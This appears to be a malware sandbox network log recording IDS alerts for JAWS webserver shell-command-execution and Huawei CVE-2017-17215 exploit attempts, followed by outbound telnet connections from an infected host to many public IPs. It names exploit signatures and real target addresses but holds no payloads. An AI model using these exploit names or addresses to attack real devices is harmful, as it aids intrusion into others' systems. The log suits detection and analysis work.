                                  192.168.2.2385.17.194.16538044802030092 07/19/22-13:08:02.024795TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3804480192.168.2.2385.17.194.165
                                  192.168.2.2317.248.207.1146268802030092 07/19/22-13:08:15.765696TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4626880192.168.2.2317.248.207.11
                                  192.168.2.23208.219.20.19336250802030092 07/19/22-13:08:56.500394TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3625080192.168.2.23208.219.20.193
                                  192.168.2.23156.250.20.10550980372152835222 07/19/22-13:07:33.593341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098037215192.168.2.23156.250.20.105
                                  192.168.2.2370.166.193.19542020802030092 07/19/22-13:07:45.970532TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4202080192.168.2.2370.166.193.195
                                  192.168.2.23156.225.146.4148512372152835222 07/19/22-13:08:40.941172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851237215192.168.2.23156.225.146.41
                                  192.168.2.23156.226.96.13845370372152835222 07/19/22-13:08:02.457456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4537037215192.168.2.23156.226.96.138
                                  192.168.2.2393.115.143.7752936802030092 07/19/22-13:07:13.849568TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5293680192.168.2.2393.115.143.77
                                  192.168.2.23192.185.42.23652266802030092 07/19/22-13:08:02.164539TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5226680192.168.2.23192.185.42.236
                                  192.168.2.23156.250.88.9540758372152835222 07/19/22-13:07:44.302283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4075837215192.168.2.23156.250.88.95
                                  192.168.2.2323.193.134.6158220802030092 07/19/22-13:08:56.555062TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5822080192.168.2.2323.193.134.61
                                  192.168.2.23107.175.78.735196802030092 07/19/22-13:07:25.240558TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3519680192.168.2.23107.175.78.7
                                  192.168.2.23195.179.109.19744858802030092 07/19/22-13:07:50.981149TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4485880192.168.2.23195.179.109.197
                                  192.168.2.23156.245.61.15456196372152835222 07/19/22-13:08:10.247333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619637215192.168.2.23156.245.61.154
                                  192.168.2.23156.241.13.14343604372152835222 07/19/22-13:08:24.116886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4360437215192.168.2.23156.241.13.143
                                  192.168.2.2352.41.188.18751512802030092 07/19/22-13:08:28.992899TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5151280192.168.2.2352.41.188.187
                                  192.168.2.23162.252.172.5336916802030092 07/19/22-13:07:00.367540TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3691680192.168.2.23162.252.172.53
                                  192.168.2.2354.147.75.5960866802030092 07/19/22-13:08:23.501968TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6086680192.168.2.2354.147.75.59
                                  192.168.2.23168.188.174.25448690802030092 07/19/22-13:07:59.768625TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4869080192.168.2.23168.188.174.254
                                  192.168.2.2351.89.151.14654838802030092 07/19/22-13:08:17.622775TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5483880192.168.2.2351.89.151.146
                                  192.168.2.2320.105.154.4257620802030092 07/19/22-13:07:00.555167TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5762080192.168.2.2320.105.154.42
                                  192.168.2.2365.21.9.21157622802030092 07/19/22-13:08:37.249180TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5762280192.168.2.2365.21.9.211
                                  192.168.2.2323.13.112.19836184802030092 07/19/22-13:08:23.625461TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3618480192.168.2.2323.13.112.198
                                  192.168.2.23156.226.196.20144100802030092 07/19/22-13:08:48.883282TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4410080192.168.2.23156.226.196.201
                                  192.168.2.2313.125.39.8536406802030092 07/19/22-13:08:32.174136TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3640680192.168.2.2313.125.39.85
                                  192.168.2.23154.95.176.3937378802030092 07/19/22-13:07:47.364953TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3737880192.168.2.23154.95.176.39
                                  192.168.2.2345.57.228.21559030802030092 07/19/22-13:07:30.739077TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5903080192.168.2.2345.57.228.215
                                  192.168.2.2334.84.40.12059744802030092 07/19/22-13:08:23.470131TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5974480192.168.2.2334.84.40.120
                                  192.168.2.2363.41.132.16460828802030092 07/19/22-13:08:49.017007TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6082880192.168.2.2363.41.132.164
                                  192.168.2.23156.238.52.20135326372152835222 07/19/22-13:07:41.515959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3532637215192.168.2.23156.238.52.201
                                  192.168.2.2380.41.68.20243354802030092 07/19/22-13:07:39.014555TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4335480192.168.2.2380.41.68.202
                                  192.168.2.23156.226.100.8354378372152835222 07/19/22-13:08:35.815339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437837215192.168.2.23156.226.100.83
                                  192.168.2.23156.250.123.11459908372152835222 07/19/22-13:08:31.623957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990837215192.168.2.23156.250.123.114
                                  192.168.2.2313.226.97.15055970802030092 07/19/22-13:07:42.717765TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5597080192.168.2.2313.226.97.150
                                  192.168.2.2352.218.177.24151636802030092 07/19/22-13:07:25.429195TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5163680192.168.2.2352.218.177.241
                                  192.168.2.23186.179.42.6339354802030092 07/19/22-13:08:08.536766TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3935480192.168.2.23186.179.42.63
                                  192.168.2.2362.93.4.3357528802030092 07/19/22-13:08:59.700744TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5752880192.168.2.2362.93.4.33
                                  192.168.2.23202.5.20.19139578802030092 07/19/22-13:07:00.425756TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3957880192.168.2.23202.5.20.191
                                  192.168.2.23156.241.11.5737424372152835222 07/19/22-13:08:24.106000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3742437215192.168.2.23156.241.11.57
                                  192.168.2.2351.104.181.17354760802030092 07/19/22-13:08:37.332819TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5476080192.168.2.2351.104.181.173
                                  192.168.2.23129.219.99.15132770802030092 07/19/22-13:08:54.053880TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3277080192.168.2.23129.219.99.151
                                  192.168.2.2331.133.86.4956796802030092 07/19/22-13:08:45.628723TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5679680192.168.2.2331.133.86.49
                                  192.168.2.23156.241.83.7547706372152835222 07/19/22-13:08:24.123815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770637215192.168.2.23156.241.83.75
                                  192.168.2.2354.70.46.14754662802030092 07/19/22-13:08:45.770093TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5466280192.168.2.2354.70.46.147
                                  192.168.2.2323.48.14.20458472802030092 07/19/22-13:07:00.404353TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5847280192.168.2.2323.48.14.204
                                  192.168.2.23216.74.238.5337440802030092 07/19/22-13:07:30.448141TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3744080192.168.2.23216.74.238.53
                                  192.168.2.23104.76.130.25234680802030092 07/19/22-13:08:06.138891TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3468080192.168.2.23104.76.130.252
                                  192.168.2.23209.236.239.17756568802030092 07/19/22-13:08:59.799760TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5656880192.168.2.23209.236.239.177
                                  192.168.2.2379.175.164.1354888802030092 07/19/22-13:07:55.681075TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5488880192.168.2.2379.175.164.13
                                  192.168.2.23159.65.187.1752160802030092 07/19/22-13:08:41.635682TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5216080192.168.2.23159.65.187.17
                                  192.168.2.23216.172.146.20847906802030092 07/19/22-13:07:47.858666TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4790680192.168.2.23216.172.146.208
                                  192.168.2.23184.87.124.15544938802030092 07/19/22-13:08:13.770469TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4493880192.168.2.23184.87.124.155
                                  192.168.2.23156.244.92.17738034372152835222 07/19/22-13:08:16.875182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3803437215192.168.2.23156.244.92.177
                                  192.168.2.2352.37.94.9835484802030092 07/19/22-13:07:52.902664TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3548480192.168.2.2352.37.94.98
                                  192.168.2.23156.241.163.10851858802030092 07/19/22-13:08:10.152906TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5185880192.168.2.23156.241.163.108
                                  192.168.2.23156.244.118.22142572372152835222 07/19/22-13:08:47.429999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257237215192.168.2.23156.244.118.221
                                  192.168.2.2377.68.75.9958850802030092 07/19/22-13:08:04.547628TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5885080192.168.2.2377.68.75.99
                                  192.168.2.23108.128.25.16952300802030092 07/19/22-13:07:21.850133TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5230080192.168.2.23108.128.25.169
                                  192.168.2.2354.187.208.17135748802030092 07/19/22-13:08:12.923890TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3574880192.168.2.2354.187.208.171
                                  192.168.2.2323.21.212.18348008802030092 07/19/22-13:08:27.075864TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4800880192.168.2.2323.21.212.183
                                  192.168.2.2313.226.244.14956560802030092 07/19/22-13:07:21.789737TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5656080192.168.2.2313.226.244.149
                                  192.168.2.23203.45.224.19560946802030092 07/19/22-13:08:37.914311TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6094680192.168.2.23203.45.224.195
                                  192.168.2.23195.147.2.744868802030092 07/19/22-13:07:55.431877TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4486880192.168.2.23195.147.2.7
                                  192.168.2.23156.250.28.7334648372152835222 07/19/22-13:07:41.332294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464837215192.168.2.23156.250.28.73
                                  192.168.2.23212.11.218.1560800802030092 07/19/22-13:07:55.726714TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6080080192.168.2.23212.11.218.15
                                  192.168.2.2335.241.9.6550430802030092 07/19/22-13:07:59.573557TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5043080192.168.2.2335.241.9.65
                                  192.168.2.2365.21.193.4648542802030092 07/19/22-13:08:17.649196TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4854280192.168.2.2365.21.193.46
                                  192.168.2.2346.212.106.22255196802030092 07/19/22-13:07:52.750585TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5519680192.168.2.2346.212.106.222
                                  192.168.2.23138.201.183.21735476802030092 07/19/22-13:08:31.671441TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3547680192.168.2.23138.201.183.217
                                  192.168.2.2390.65.228.20355434802030092 07/19/22-13:08:26.937482TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5543480192.168.2.2390.65.228.203
                                  192.168.2.23143.204.206.13642328802030092 07/19/22-13:07:58.294047TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4232880192.168.2.23143.204.206.136
                                  192.168.2.23156.226.91.10653460372152835222 07/19/22-13:08:34.314443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346037215192.168.2.23156.226.91.106
                                  192.168.2.23156.235.108.851120372152835222 07/19/22-13:07:41.433048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5112037215192.168.2.23156.235.108.8
                                  192.168.2.23104.107.244.15833332802030092 07/19/22-13:08:20.551223TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3333280192.168.2.23104.107.244.158
                                  192.168.2.2323.192.51.22141904802030092 07/19/22-13:07:55.708252TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4190480192.168.2.2323.192.51.221
                                  192.168.2.23134.84.231.1937756802030092 07/19/22-13:08:34.814775TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3775680192.168.2.23134.84.231.19
                                  192.168.2.2323.230.49.9449734802030092 07/19/22-13:07:52.874677TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4973480192.168.2.2323.230.49.94
                                  192.168.2.23156.244.72.2152014372152835222 07/19/22-13:07:52.992932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201437215192.168.2.23156.244.72.21
                                  192.168.2.23107.174.146.5649454802030092 07/19/22-13:07:18.552557TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4945480192.168.2.23107.174.146.56
                                  192.168.2.2314.168.208.758076802030092 07/19/22-13:07:33.667192TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5807680192.168.2.2314.168.208.7
                                  192.168.2.2334.117.4.7946370802030092 07/19/22-13:08:37.564886TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4637080192.168.2.2334.117.4.79
                                  192.168.2.23156.235.96.11154430372152835222 07/19/22-13:08:55.521463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443037215192.168.2.23156.235.96.111
                                  192.168.2.23156.229.184.16855334802030092 07/19/22-13:08:41.709998TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5533480192.168.2.23156.229.184.168
                                  192.168.2.23185.182.76.16236730802030092 07/19/22-13:08:37.375732TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3673080192.168.2.23185.182.76.162
                                  192.168.2.23172.252.255.8346792802030092 07/19/22-13:08:20.531798TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4679280192.168.2.23172.252.255.83
                                  192.168.2.23160.124.63.24033748802030092 07/19/22-13:08:08.645844TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3374880192.168.2.23160.124.63.240
                                  192.168.2.2378.129.188.2640694802030092 07/19/22-13:07:08.550824TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4069480192.168.2.2378.129.188.26
                                  192.168.2.23189.237.62.24351100802030092 07/19/22-13:08:20.539915TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5110080192.168.2.23189.237.62.243
                                  192.168.2.2361.71.107.19255962802030092 07/19/22-13:08:09.078572TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5596280192.168.2.2361.71.107.192
                                  192.168.2.23177.185.63.9948538802030092 07/19/22-13:08:16.301503TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4853880192.168.2.23177.185.63.99
                                  192.168.2.2362.133.73.18443228802030092 07/19/22-13:08:56.591684TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4322880192.168.2.2362.133.73.184
                                  192.168.2.23156.250.86.12840618372152835222 07/19/22-13:08:16.804257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061837215192.168.2.23156.250.86.128
                                  192.168.2.23156.238.46.23842282372152835222 07/19/22-13:07:54.053481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4228237215192.168.2.23156.238.46.238
                                  192.168.2.23118.219.148.24148884802030092 07/19/22-13:07:47.512338TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4888480192.168.2.23118.219.148.241
                                  192.168.2.23202.125.85.13042668802030092 07/19/22-13:07:00.453104TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4266880192.168.2.23202.125.85.130
                                  192.168.2.23104.66.38.24457736802030092 07/19/22-13:07:22.567641TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5773680192.168.2.23104.66.38.244
                                  192.168.2.2312.133.236.21435964802030092 07/19/22-13:08:03.641325TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3596480192.168.2.2312.133.236.214
                                  192.168.2.23184.85.116.23637692802030092 07/19/22-13:07:22.448122TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3769280192.168.2.23184.85.116.236
                                  192.168.2.23209.23.113.1344730802030092 07/19/22-13:07:44.062655TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4473080192.168.2.23209.23.113.13
                                  192.168.2.23197.26.60.8253916802030092 07/19/22-13:07:22.887927TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5391680192.168.2.23197.26.60.82
                                  192.168.2.23202.61.191.15159648802030092 07/19/22-13:07:48.117257TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5964880192.168.2.23202.61.191.151
                                  192.168.2.2343.229.92.13460384802030092 07/19/22-13:07:53.124849TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6038480192.168.2.2343.229.92.134
                                  192.168.2.23192.95.37.8552832802030092 07/19/22-13:07:43.855621TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5283280192.168.2.23192.95.37.85
                                  192.168.2.2323.211.0.24544952802030092 07/19/22-13:07:43.980951TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4495280192.168.2.2323.211.0.245
                                  192.168.2.23156.225.140.14945514372152835222 07/19/22-13:07:34.104468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4551437215192.168.2.23156.225.140.149
                                  192.168.2.23156.226.43.25559524372152835222 07/19/22-13:07:22.658082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952437215192.168.2.23156.226.43.255
                                  192.168.2.23104.69.137.16160946802030092 07/19/22-13:07:25.154093TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6094680192.168.2.23104.69.137.161
                                  192.168.2.23186.194.17.9860724802030092 07/19/22-13:07:46.083805TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6072480192.168.2.23186.194.17.98
                                  192.168.2.23159.65.123.5648486802030092 07/19/22-13:07:16.235648TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4848680192.168.2.23159.65.123.56
                                  192.168.2.23104.71.187.22448640802030092 07/19/22-13:07:52.958023TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4864080192.168.2.23104.71.187.224
                                  192.168.2.23154.50.201.8755072802030092 07/19/22-13:07:31.970597TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5507280192.168.2.23154.50.201.87
                                  192.168.2.23156.250.11.18740990372152835222 07/19/22-13:08:54.395419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099037215192.168.2.23156.250.11.187
                                  192.168.2.2318.67.56.6538818802030092 07/19/22-13:08:43.060701TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3881880192.168.2.2318.67.56.65
                                  192.168.2.23156.254.77.9444256372152835222 07/19/22-13:08:20.904827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4425637215192.168.2.23156.254.77.94
                                  192.168.2.23156.241.112.20251016372152835222 07/19/22-13:07:22.658317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101637215192.168.2.23156.241.112.202
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 19, 2022 13:06:56.210398912 CEST4617723192.168.2.23193.207.201.19
                                  Jul 19, 2022 13:06:56.210449934 CEST4617723192.168.2.23202.17.136.138
                                  Jul 19, 2022 13:06:56.210458994 CEST4617723192.168.2.2394.218.188.212
                                  Jul 19, 2022 13:06:56.210458994 CEST4617723192.168.2.23160.122.30.19
                                  Jul 19, 2022 13:06:56.210459948 CEST4617723192.168.2.2349.181.147.171
                                  Jul 19, 2022 13:06:56.210483074 CEST4617723192.168.2.23105.114.20.237
                                  Jul 19, 2022 13:06:56.210489035 CEST4617723192.168.2.23169.3.196.145
                                  Jul 19, 2022 13:06:56.210491896 CEST4617723192.168.2.2337.107.43.78
                                  Jul 19, 2022 13:06:56.210493088 CEST4617723192.168.2.2342.202.24.61
                                  Jul 19, 2022 13:06:56.210500956 CEST4617723192.168.2.23125.67.110.53
                                  Jul 19, 2022 13:06:56.210500002 CEST4617723192.168.2.23202.46.125.187
                                  Jul 19, 2022 13:06:56.210522890 CEST4617723192.168.2.2348.238.70.229
                                  Jul 19, 2022 13:06:56.210525036 CEST4617723192.168.2.2366.192.212.214
                                  Jul 19, 2022 13:06:56.210527897 CEST4617723192.168.2.23201.248.234.52
                                  Jul 19, 2022 13:06:56.210531950 CEST4617723192.168.2.2367.143.33.145
                                  Jul 19, 2022 13:06:56.210547924 CEST4617723192.168.2.23151.72.96.34
                                  Jul 19, 2022 13:06:56.210567951 CEST4617723192.168.2.23168.141.39.254
                                  Jul 19, 2022 13:06:56.210572958 CEST4617723192.168.2.23168.61.180.41
                                  Jul 19, 2022 13:06:56.210572958 CEST4617723192.168.2.23149.26.196.221
                                  Jul 19, 2022 13:06:56.210577965 CEST4617723192.168.2.23109.97.31.10
                                  Jul 19, 2022 13:06:56.210582018 CEST4617723192.168.2.23153.128.123.191
                                  Jul 19, 2022 13:06:56.210583925 CEST4617723192.168.2.23119.203.177.173
                                  Jul 19, 2022 13:06:56.210597038 CEST4617723192.168.2.23119.228.96.47
                                  Jul 19, 2022 13:06:56.210599899 CEST4617723192.168.2.23137.233.130.94
                                  Jul 19, 2022 13:06:56.210604906 CEST4617723192.168.2.23141.248.15.220
                                  Jul 19, 2022 13:06:56.210606098 CEST4617723192.168.2.2365.8.177.199
                                  Jul 19, 2022 13:06:56.210607052 CEST4617723192.168.2.2373.137.97.137
                                  Jul 19, 2022 13:06:56.210611105 CEST4617723192.168.2.23156.51.54.181
                                  Jul 19, 2022 13:06:56.210617065 CEST4617723192.168.2.2368.85.110.66
                                  Jul 19, 2022 13:06:56.210623026 CEST4617723192.168.2.23172.149.3.84
                                  Jul 19, 2022 13:06:56.210624933 CEST4617723192.168.2.23140.247.251.105
                                  Jul 19, 2022 13:06:56.210633039 CEST4617723192.168.2.23222.214.187.210
                                  Jul 19, 2022 13:06:56.210644007 CEST4617723192.168.2.23209.174.193.196
                                  Jul 19, 2022 13:06:56.210648060 CEST4617723192.168.2.23191.38.32.186
                                  Jul 19, 2022 13:06:56.210649014 CEST4617723192.168.2.238.105.235.85
                                  Jul 19, 2022 13:06:56.210649967 CEST4617723192.168.2.23197.147.196.71
                                  Jul 19, 2022 13:06:56.210654974 CEST4617723192.168.2.23119.167.82.28
                                  Jul 19, 2022 13:06:56.210665941 CEST4617723192.168.2.23133.65.193.90
                                  Jul 19, 2022 13:06:56.210668087 CEST4617723192.168.2.2373.112.40.30
                                  Jul 19, 2022 13:06:56.210674047 CEST4617723192.168.2.2394.109.3.189
                                  Jul 19, 2022 13:06:56.210675955 CEST4617723192.168.2.23158.102.123.111
                                  Jul 19, 2022 13:06:56.210680962 CEST4617723192.168.2.2373.240.191.187
                                  Jul 19, 2022 13:06:56.210700035 CEST4617723192.168.2.2384.56.8.90
                                  Jul 19, 2022 13:06:56.210711002 CEST4617723192.168.2.23153.40.83.141
                                  Jul 19, 2022 13:06:56.210721970 CEST4617723192.168.2.23158.211.109.128
                                  Jul 19, 2022 13:06:56.210722923 CEST4617723192.168.2.2323.143.228.231
                                  Jul 19, 2022 13:06:56.210730076 CEST4617723192.168.2.239.249.143.68
                                  Jul 19, 2022 13:06:56.210738897 CEST4617723192.168.2.2317.1.102.221
                                  Jul 19, 2022 13:06:56.210741043 CEST4617723192.168.2.23186.175.32.76
                                  Jul 19, 2022 13:06:56.210750103 CEST4617723192.168.2.23131.53.16.92
                                  Jul 19, 2022 13:06:56.210758924 CEST4617723192.168.2.23195.175.252.174
                                  Jul 19, 2022 13:06:56.210767031 CEST4617723192.168.2.23194.98.0.75
                                  Jul 19, 2022 13:06:56.210771084 CEST4617723192.168.2.2327.153.65.201
                                  Jul 19, 2022 13:06:56.210772038 CEST4617723192.168.2.235.115.74.209
                                  Jul 19, 2022 13:06:56.210783005 CEST4617723192.168.2.23115.16.254.1
                                  Jul 19, 2022 13:06:56.210791111 CEST4617723192.168.2.2376.57.169.7
                                  Jul 19, 2022 13:06:56.210794926 CEST4617723192.168.2.23139.126.79.31
                                  Jul 19, 2022 13:06:56.210797071 CEST4617723192.168.2.23197.79.32.188
                                  Jul 19, 2022 13:06:56.210808992 CEST4617723192.168.2.2374.153.183.137
                                  Jul 19, 2022 13:06:56.210813046 CEST4617723192.168.2.23146.1.209.36
                                  Jul 19, 2022 13:06:56.210820913 CEST4617723192.168.2.23105.153.162.193
                                  Jul 19, 2022 13:06:56.210829020 CEST4617723192.168.2.2377.2.136.37
                                  Jul 19, 2022 13:06:56.210839033 CEST4617723192.168.2.2314.93.253.44
                                  Jul 19, 2022 13:06:56.210844994 CEST4617723192.168.2.2359.238.32.252
                                  Jul 19, 2022 13:06:56.210851908 CEST4617723192.168.2.23192.46.173.177
                                  Jul 19, 2022 13:06:56.210861921 CEST4617723192.168.2.2388.199.210.91
                                  Jul 19, 2022 13:06:56.210870981 CEST4617723192.168.2.23128.176.202.39
                                  Jul 19, 2022 13:06:56.210879087 CEST4617723192.168.2.2386.237.80.143
                                  Jul 19, 2022 13:06:56.210881948 CEST4617723192.168.2.23166.250.196.72
                                  Jul 19, 2022 13:06:56.210894108 CEST4617723192.168.2.23129.149.59.170
                                  Jul 19, 2022 13:06:56.210895061 CEST4617723192.168.2.2344.252.89.63
                                  Jul 19, 2022 13:06:56.210906029 CEST4617723192.168.2.2359.62.78.205
                                  Jul 19, 2022 13:06:56.210916042 CEST4617723192.168.2.23147.88.24.255
                                  Jul 19, 2022 13:06:56.210920095 CEST4617723192.168.2.23218.176.209.180
                                  Jul 19, 2022 13:06:56.210928917 CEST4617723192.168.2.23186.98.100.203
                                  Jul 19, 2022 13:06:56.210932016 CEST4617723192.168.2.23220.94.76.109
                                  Jul 19, 2022 13:06:56.210942984 CEST4617723192.168.2.23200.154.37.37
                                  Jul 19, 2022 13:06:56.210958004 CEST4617723192.168.2.23169.151.12.158
                                  Jul 19, 2022 13:06:56.210958004 CEST4617723192.168.2.23178.87.29.51
                                  Jul 19, 2022 13:06:56.210958958 CEST4617723192.168.2.23117.173.211.63
                                  Jul 19, 2022 13:06:56.210973978 CEST4617723192.168.2.2312.23.149.24
                                  Jul 19, 2022 13:06:56.210974932 CEST4617723192.168.2.2344.223.222.101
                                  Jul 19, 2022 13:06:56.210979939 CEST4617723192.168.2.23123.104.25.179
                                  Jul 19, 2022 13:06:56.210980892 CEST4617723192.168.2.23201.50.14.196
                                  Jul 19, 2022 13:06:56.210988045 CEST4617723192.168.2.23177.49.181.194
                                  Jul 19, 2022 13:06:56.210989952 CEST4617723192.168.2.23157.235.121.245
                                  Jul 19, 2022 13:06:56.210999012 CEST4617723192.168.2.2335.49.112.221
                                  Jul 19, 2022 13:06:56.210999012 CEST4617723192.168.2.23167.40.147.119
                                  Jul 19, 2022 13:06:56.211008072 CEST4617723192.168.2.23135.92.33.135
                                  Jul 19, 2022 13:06:56.211014032 CEST4617723192.168.2.23200.53.110.179
                                  Jul 19, 2022 13:06:56.211023092 CEST4617723192.168.2.23203.83.59.112
                                  Jul 19, 2022 13:06:56.211024046 CEST4617723192.168.2.23173.220.164.9
                                  Jul 19, 2022 13:06:56.211028099 CEST4617723192.168.2.2366.58.21.193
                                  Jul 19, 2022 13:06:56.211033106 CEST4617723192.168.2.23110.253.210.9
                                  Jul 19, 2022 13:06:56.211041927 CEST4617723192.168.2.23142.50.168.216
